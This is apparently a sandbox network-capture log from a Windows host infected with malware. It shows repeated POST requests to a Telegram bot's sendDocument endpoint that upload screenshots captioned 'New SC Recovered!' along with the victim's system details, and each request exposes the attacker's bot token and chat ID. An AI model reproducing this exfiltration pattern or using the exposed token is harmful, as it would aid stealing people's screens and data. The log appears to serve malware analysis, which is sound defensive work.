2025-01-08 11:34:32 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:34:32 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:34:32 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:34:32 UTC	11871	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:34:32 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 33 64 66 38 33 34 35 32 36 38 65 2d 2d 0d 0a Data Ascii: -----------------------------8dd63df8345268e--
2025-01-08 11:34:32 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:34:32 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138015,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336072,"document":{"file_name":"user-116938 2025-03-15 16-36-18.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbH2d-YsgOvHbZXI-a5ISG2oBOhB2uAAJgFgACPzjxU6Zo8Trju9vGAQAHbQADNgQ","file_unique_id":"AQADYBYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbH2d-YsgOvHbZXI-a5ISG2oBOhB2uAAJgFgACPzjxU6Zo8Trju9vGAQAHbQADNgQ","file_unique_id":"AQADYBYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGx9nfmLIDrx22VyPmuSEhtqAToQdrgACYBYAAj848VOmaPE647vbxjYE","file_unique_id":"AgADYBYAAj848VM","file_size":76828},"caption":"New SC Recovered!\n\nTime: 03/15/2025 16:16:18\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.7	49743	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:34:45 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fae89acf2fe Host: api.telegram.org Content-Length: 77457 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:34:45 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:34:45 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 61 63 66 32 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 61 63 66 32 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 30 36 3a 33 34 3a 34 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fae89acf2feContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fae89acf2feContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/08/2025 06:34:43User
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:34:45 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:34:45 UTC	11871	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:34:45 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 61 63 66 32 66 65 2d 2d 0d 0a Data Ascii: -----------------------------8dd2fae89acf2fe--
2025-01-08 11:34:45 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:34:45 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138017,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336085,"document":{"file_name":"user-116938 2025-01-08 06-34-43.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbIWd-YtUwGSAlH5IR-U11hKd9S1uWAAJiFgACPzjxU92DaTnEfgqeAQAHbQADNgQ","file_unique_id":"AQADYhYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbIWd-YtUwGSAlH5IR-U11hKd9S1uWAAJiFgACPzjxU92DaTnEfgqeAQAHbQADNgQ","file_unique_id":"AQADYhYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGyFnfmLVMBkgJR-SEflNdYSnfUtblgACYhYAAj848VPdg2k5xH4KnjYE","file_unique_id":"AgADYhYAAj848VM","file_size":76828},"caption":"New SC Recovered!\n\nTime: 01/08/2025 06:34:43\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.7	49744	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:34:45 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2fae89af553c Host: api.telegram.org Content-Length: 77457 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:34:45 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:34:45 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 61 66 35 35 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 61 66 35 35 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 38 2f 32 30 32 35 20 30 36 3a 33 34 3a 34 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd2fae89af553cContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd2fae89af553cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/08/2025 06:34:43User
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:34:45 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:34:45 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:34:45 UTC	11871	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:34:45 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 66 61 65 38 39 61 66 35 35 33 63 2d 2d 0d 0a Data Ascii: -----------------------------8dd2fae89af553c--
